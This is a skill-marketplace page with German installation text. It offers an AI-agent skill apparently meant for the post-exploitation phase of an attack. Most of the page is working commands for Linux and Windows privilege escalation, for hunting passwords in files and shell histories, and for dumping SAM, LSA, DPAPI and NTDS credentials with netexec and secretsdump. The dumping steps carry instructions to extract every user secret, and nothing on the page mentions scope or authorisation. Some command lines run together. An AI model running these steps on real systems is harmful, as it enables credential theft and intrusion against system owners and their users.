Standardmäßig ist der Prompt ausgewählt, der zuerst die Quelle prüft. Sie können zu einem direkten Befehl wechseln oder eine lokale Kopie herunterladen.
Quelldateien prüfen
Lesen Sie SKILL.md und alle von SkillsMP angezeigten Begleitdateien, bevor Sie sich für eine Installation entscheiden.
Mit Codex oder Claude installieren Kopieren Sie diesen Prompt, fügen Sie ihn in Codex, Claude oder einen anderen Assistant ein und lassen Sie die Skill-Seite prüfen und installieren.
Ein direkter Befehl überspringt den Prüf-Prompt. Prüfen Sie die Quelle, bevor Sie ihn ausführen.
Post-exploitation phase — privilege escalation, lateral movement, credential dumping, data discovery. Use when the current phase is POST_EXPLOIT.
Post-Exploitation Checklist
Linux Privilege Escalation
# Quick winssudo -l # sudo permissions
find / -perm -4000 -type f 2>/dev/null # SUID binaries
find / -perm -2000 -type f 2>/dev/null # SGID binariescat /etc/crontab; ls -la /etc/cron.* # cron jobsls -la /etc/passwd /etc/shadow # readable shadow?uname -a # kernel version → kernel exploitscat /proc/version
# Credentials in files
grep -rli 'password\|passwd\|secret\|key' /etc/ /opt/ /var/ /home/ 2>/dev/null | head -30
find / -name "*.conf" -o -name "*.cfg" -o -name "*.ini" -o -name ".env" 2>/dev/null | head -20
cat /home/*/.bash_history 2>/dev/null
# Network info
ss -tlnp
cat /etc/hosts
arp -a
# Automated# Upload and run linpeas.sh or linux-exploit-suggester
Windows Privilege Escalation
whoami /priv # token privilegeswhoami /groups # group membership
systeminfo # OS version, hotfixes
net user; net localgroup administrators
cmdkey /list # stored credentials
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"# autologon# Service misconfigs
wmic service get name,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows"
icacls "<service_path>"# writable service binary?# Unquoted service paths
wmic service get name,displayname,pathname | findstr /i /v "C:\Windows" | findstr /i /v """
# Automated: winPEAS, PowerUp, Seatbelt
Credential Dumping
Windows — netexec/crackmapexec (preferred, run ALL three in order)
# 1. SAM — local account hashes (always works with local admin)
netexec smb HOST -u USER -p PASS --sam
# 2. LSA — service passwords, cached domain creds, machine account, DPAPI system keys
netexec smb HOST -u USER -p PASS --lsa
# 3. DPAPI — FULL user secrets dump: browser passwords, vault, cookies, Credential Manager# CRITICAL: bare --dpapi = EVERYTHING. Do NOT add subcommands (cookies/nosystem/wifi)# Adding subcommands LIMITS the output. Always start with bare --dpapi.
netexec smb HOST -u USER -p PASS --dpapi
# 4. Domain Controller only — ALL domain hashes from NTDS.dit
netexec smb DC -u USER -p PASS --ntds
# 5. Fallback — SAM+LSA+NTDS in one shot via impacket
secretsdump.py DOMAIN/USER:PASS@HOST